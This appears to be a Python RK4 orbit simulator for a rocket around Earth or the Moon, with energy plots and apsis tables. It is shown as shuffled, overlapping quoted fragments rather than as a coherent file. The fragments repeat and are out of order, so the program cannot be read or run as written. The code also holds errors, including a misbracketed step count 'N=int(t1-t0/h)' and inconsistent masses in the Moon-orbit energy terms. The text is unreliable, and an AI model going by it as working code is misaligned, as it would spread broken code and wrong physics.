prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of", "6.371e6 #radius of earth (m) Mm = 7.348e22 #mass of the Moon (kg)", "k1x * 0.5, y[i] + h * k1y * 0.5) k2vy = F4(x[i]", "Mr = 5e3 #mass of the rocket (kg) rM = 1.737e6 #radius of", "is the sum of these two # Part A RK4 Implementation for i", "y[i] + (h/6) * (k1y + 2 * k2y + 2 * k3y", "* (k1vx + 2 * k2vx + 2 * k3vx +k4vx) vy[i+1] =", "* 0.5) k3vy = F6(x[i] + h * k2x * 0.5, y[i] +", "#dvy/dt including influence of the Moon def F6(x,y): return (-1*(Mm * y *", "0.5 * k2vy) k3vx = F5(x[i] + h * k2x * 0.5, y[i]", "label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color", "#2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y = F2(vy[i]", "* k2x + 2 * k3x + k4x) y[i+1] = y[i] + (h/6)", "ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth =", "/ ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt", "= F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y", "ax2.legend() plt.show() Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h) x, y,", "* k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F5(x[i] +", "#Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0]", "k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx = F3(x[i]", "G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)))", "axis (units are in m/s) (If the previously reccommended altitude is set then", "= y0 vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y) # x", "'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total", "h * k3x, y[i] + h * k3y) k4vy = F6(x[i] + h", "'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total", "+ h * 0.5 * k2vy) k3vx = F5(x[i] + h * k2x", "the Moon def F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) +", "Please select which body you wish your rocket to orbit (enter 1 or", "print(\"\"\" Please enter initial coordinates for your rocket (units are in m): (I", "x = 0, y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0 =", "* k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx =", "* 0.5) #4 k4x = F1(vx[i] + h * k3vx) k4y = F2(vy[i]", "print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx, vy, t,", "Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] =", "choice = input() if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please", "= np.hypot(x,y) # x and y coordinates compounded in a single position variable", "= plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y,", "0.5) #4 k4x = F1(vx[i] + h * k3vx) k4y = F2(vy[i] +", "you wish your rocket to orbit (enter 1 or 2): \\n 1. Earth", "PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of the Earth (kg) rE", "= 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please select which body", "50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N),", "h * k1y * 0.5) k2vy = F4(x[i] + h * k1x *", "param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical", "y0 vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y) # x and", "energy is the sum of these two # Part B RK4 Implementation for", "of the Earth (kg) rE = 6.371e6 #radius of earth (m) Mm =", "vx0 vy[0] = vy0 t[0] = 0 r = np.hypot(x,y) # x and", "vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') x[0] = x0 y[0]", "the moon (m) d = 3.844e8 # Distance between Earth and the Moon", "= F4(x[i] + h * k1x * 0.5, y[i] + h * k1y", "# Part B RK4 Implementation for i in range (0, N-1): #1 k1x", "2 * k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6)", "k3vy = F4(x[i] + h * k2x * 0.5, y[i] + h *", "= plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)')", "= F2(vy[i] + h * 0.5 * k1vy) k2vx = F3(x[i] + h", "= 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon =", "#radius of the moon (m) d = 3.844e8 # Distance between Earth and", "input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') x[0]", "h * 0.5 * k2vy) k3vx = F3(x[i] + h * k2x *", "Distance between Earth and the Moon (m) #dx/dt def F1(vx): return vx #dy/dt", "#dvy/dt def F4(x,y): return -1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))", "t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N)", "(Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon", "= F2(vy[i] + h * 0.5 * k1vy) k2vx = F5(x[i] + h", "0.5, y[i] + h * k1y * 0.5) k2vy = F6(x[i] + h", "Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth =", "ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time", "of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic", "= input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''')", "0.5) k3vy = F4(x[i] + h * k2x * 0.5, y[i] + h", "input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') h", "ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep,", "np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] =", "= 6.674e-11 Me = 5.972e24 #mass of the Earth (kg) rE = 6.371e6", "* (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x *", "Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et,", "Moon\"\"\") choice = input() if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\"", "k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy", "2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy + 2", "@author: Alex \"\"\" import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from", "(kg) rE = 6.371e6 #radius of earth (m) Mm = 7.348e22 #mass of", "F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y =", "initial velocities along the x and y axis (units are in m/s) (If", "k3x + k4x) y[i+1] = y[i] + (h/6) * (k1y + 2 *", "Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d])", "2 * k3y + k4y) vx[i+1] = vx[i] + (h/6) * (k1vx +", "Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h =", "moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy", "y coordinates compounded in a single position variable 'r' v = np.hypot(vx,vy) #", "= 0, y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy", "y[i] + h * k1y * 0.5) #3 k3x = F1(vx[i] + h", "of the Moon (kg) Mr = 5e3 #mass of the rocket (kg) rM", "starting with x = 7x10^6 and y = 0)\"\"\") x0 = input(\"x =", "Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE :", "k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i]", "* 0.5, y[i] + h * k1y * 0.5) k2vy = F6(x[i] +", "rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket", "1.737e6 #radius of the moon (m) d = 3.844e8 # Distance between Earth", "def F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return", "# Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides =", "ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon')", "2020 @author: Alex \"\"\" import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background')", "print(\"\"\" Please enter initial velocities along the x and y axis (units are", "+ 2 * k3y + k4y) vx[i+1] = vx[i] + (h/6) * (k1vx", "= 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t = np.zeros(N),", "displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE,", "ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice", "= \") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') x[0] =", "F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 *", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for", "Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit", "Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is", "range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i])", "position variable 'r' v = np.hypot(vx,vy) # Velocities in the x and y", "k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i]", "+ h * k3x, y[i] + h * k3y) x[i+1] = x[i] +", "'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0],", "F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 *", "* (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the", "def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket", "(h/6) * (k1vx + 2 * k2vx + 2 * k3vx +k4vx) vy[i+1]", "h * k2y * 0.5) k3vy = F6(x[i] + h * k2x *", "k3vy) k4vx = F5(x[i] + h * k3x, y[i] + h * k3y)", "5.972e24 #mass of the Earth (kg) rE = 6.371e6 #radius of earth (m)", "Velocities (x,y) print(\"\"\" Please enter initial velocities along the x and y axis\"\"\")", "+ h * k3vx) k4y = F2(vy[i] + h * k3vy) k4vx =", "Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your rocket (units are in", "plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)')", "rocket (units are in m): (I reccommend starting with x = 7x10^6 and", "= F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] +", "k2x * 0.5, y[i] + h * k2y * 0.5) #4 k4x =", "0)\"\"\") x0 = input(\"x = \") y0 = input(\"y = \") # Starting", "= plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy", "= F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5", "y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \")", "0.5, y[i] + h * k1y * 0.5) k2vy = F4(x[i] + h", "k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx)", "orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color =", "ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label =", "and the Moon (m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy): return", "input(\"x = \") y0 = input(\"y = \") # Starting Velocities (x,y) print(\"\"\"", "* 0.5 * k1vy) k2vx = F5(x[i] + h * k1x * 0.5,", "+ 2 * k2vy + 2 * k3vy + k4vy) t[i+1] = t[i]", "== \"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et,", "G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y): return (-1*(Mm", "RK4 Implementation for i in range (0, N-1): #1 k1x = F1(vx[i]) k1y", "y[0] = y0 vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y) #", "h * k1y * 0.5) #3 k3x = F1(vx[i] + h * 0.5", "'r' v = np.hypot(vx,vy) # Velocities in the x and y directions compounded", "to Alex's Rocket Orbit Simulator! Please select which body you wish your rocket", "+ h * k3y) k4vy = F4(x[i] + h * k3x, y[i] +", "(-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum of these two #", "-*- coding: utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05 2020 @author:", "\") print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx, vy,", "+ h * k1y * 0.5) #3 k3x = F1(vx[i] + h *", "F3(x[i] + h * k2x * 0.5, y[i] + h * k2y *", "k2vy = F6(x[i] + h * k1x * 0.5, y[i] + h *", "i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <=", "k2x + 2 * k3x + k4x) y[i+1] = y[i] + (h/6) *", "* k3x, y[i] + h * k3y) k4vy = F4(x[i] + h *", "'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting", "F3(x[i] + h * k3x, y[i] + h * k3y) k4vy = F4(x[i]", "of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color", "moon (m) d = 3.844e8 # Distance between Earth and the Moon (m)", "k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2", "= 5e3 #mass of the rocket (kg) rM = 1.737e6 #radius of the", "= np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and", "= (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above Earth", "choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for", "t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator!", "/ (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me * y * G)", "Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r)", "#!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Mar 4", "#dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return -1 * (Me *", "F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x =", "= np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational", "= F2(vy[i] + h * 0.5 * k2vy) k3vx = F3(x[i] + h", "input() if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial", "* k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx =", "+ h * 0.5 * k2vy) k3vx = F3(x[i] + h * k2x", "(Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 *", "of these two # Part B RK4 Implementation for i in range (0,", "(m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of", "k2x = F1(vx[i] + h * 0.5 * k1vx) k2y = F2(vy[i] +", "color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE])", "Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime')", "* k3vy) k4vx = F3(x[i] + h * k3x, y[i] + h *", "/ (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y): return (-1*(Mm *", "k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F5(x[i] + h", "enter initial coordinates for your rocket (units are in m): (I reccommend starting", "Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth", "+ h * 0.5 * k1vy) k2vx = F3(x[i] + h * k1x", "a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy',", "Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] =", "Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et,", "(h/6) * (k1y + 2 * k2y + 2 * k3y + k4y)", "y, vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "two # Part B RK4 Implementation for i in range (0, N-1): #1", "F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y =", "= plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM, color = 'white')", "x and y axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy =", "vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h)", "rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y = \") # Starting", "0.5, y[i] + h * k1y * 0.5) #3 k3x = F1(vx[i] +", "k4vx = F5(x[i] + h * k3x, y[i] + h * k3y) k4vy", "= 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of", "F4(x,y): return -1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including", "#dvx/dt including influence of the Moon def F5(x,y): return (-1*(Mm * (x-d) *", "= np.hypot(vx,vy) # Velocities in the x and y directions compounded in single", "G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y): return (-1*(Mm", "DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 =", "= np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial", "= 6.371e6 #radius of earth (m) Mm = 7.348e22 #mass of the Moon", "x[i+1] = x[i] + (h/6) * (k1x + 2 * k2x + 2", "energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total", "\") y0 = input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please enter", "'#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h) x,", "-Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum", "ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color", "= 7.348e22 #mass of the Moon (kg) Mr = 5e3 #mass of the", "== \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your", "the previously reccommended altitude is set then start with x = 0, y", "x and y directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0]", "Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the", "* x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me", "((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including", "0.5) k2vy = F4(x[i] + h * k1x * 0.5, y[i] + h", "analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label", "as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G =", "return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me *", "# Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your rocket (units", "* 0.5, y[i] + h * k2y * 0.5) #4 k4x = F1(vx[i]", "3.844e8 # Distance between Earth and the Moon (m) #dx/dt def F1(vx): return", "+ h * k3x, y[i] + h * k3y) k4vy = F4(x[i] +", "(If the previously reccommended altitude is set then start with x = 0,", "* G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\"", "previously reccommended altitude is set then start with x = 0, y =", "iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE", ": print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful", "(m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal')", "label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice ==", "= F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5", "Ep and total energy of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1]", "if min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test", "color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label", "F1(vx[i] + h * k3vx) k4y = F2(vy[i] + h * k3vy) k4vx", "Ek, Ep and total energy of the rocket for i+1 iterations Ep[i+1] =", "rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\"", "k4x) y[i+1] = y[i] + (h/6) * (k1y + 2 * k2y +", "ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy',", "along the x and y axis\"\"\") vx0 = input(\"Vx = \") vy0 =", "y[i+1] = y[i] + (h/6) * (k1y + 2 * k2y + 2", "= \") print(''' Calculating orbit... ''') x[0] = x0 y[0] = y0 vx[0]", "PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit", "of the moon (m) d = 3.844e8 # Distance between Earth and the", "np.zeros(N) x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0", "* k2y * 0.5) k3vy = F4(x[i] + h * k2x * 0.5,", "else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis", "k1vy) k2vx = F3(x[i] + h * k1x * 0.5, y[i] + h", "#Total energy is the sum of these two # Part A RK4 Implementation", "1. Earth \\n 2. Moon\"\"\") choice = input() if choice == \"1\": #", "min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else:", "Created on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy as", "directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy", "compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0]", "initial coordinates for your rocket (units are in m): (I reccommend starting with", "+ h * k2y * 0.5) #4 k4x = F1(vx[i] + h *", "Please enter initial coordinates for your rocket:\"\"\") x0 = input(\"x = \") y0", "print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please select which body you wish", "wish your rocket to orbit (enter 1 or 2): \\n 1. Earth \\n", "+ h * k2y * 0.5) k3vy = F4(x[i] + h * k2x", "= 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE])", "(-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y", "energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum of these two", "F2(vy[i] + h * k3vy) k4vx = F5(x[i] + h * k3x, y[i]", "on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy as np", "coordinates for your rocket (units are in m): (I reccommend starting with x", "k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx = F3(x[i] +", "the x and y axis (units are in m/s) (If the previously reccommended", "print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y", "the Moon (kg) Mr = 5e3 #mass of the rocket (kg) rM =", "#4 k4x = F1(vx[i] + h * k3vx) k4y = F2(vy[i] + h", "matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me =", "y[i] + h * k2y * 0.5) #4 k4x = F1(vx[i] + h", "x0 = input(\"x = \") y0 = input(\"y = \") # Starting Velocities", "0.5 * k1vy) k2vx = F3(x[i] + h * k1x * 0.5, y[i]", "y[i] + h * k2y * 0.5) k3vy = F4(x[i] + h *", "* y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y *", "for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r)", "F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me", "influence of the Moon def F6(x,y): return (-1*(Mm * y * G) /", "2. Moon\"\"\") choice = input() if choice == \"1\": # Starting Coordinates (x,y)", "\") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') h = 1", "y[i] + h * k2y * 0.5) k3vy = F6(x[i] + h *", "y0 vx[0] = vx0 vy[0] = vy0 t[0] = 0 r = np.hypot(x,y)", "(k1y + 2 * k2y + 2 * k3y + k4y) vx[i+1] =", "Moon (kg) Mr = 5e3 #mass of the rocket (kg) rM = 1.737e6", "2 * k2vy + 2 * k3vy + k4vy) t[i+1] = t[i] +", "= 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color =", "then start with x = 0, y = 7500)\"\"\") vx0 = input(\"Vx =", "vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "def F2(vy): return vy #dvx/dt def F3(x,y): return -1 * (Me * x", "plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of", "\"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) 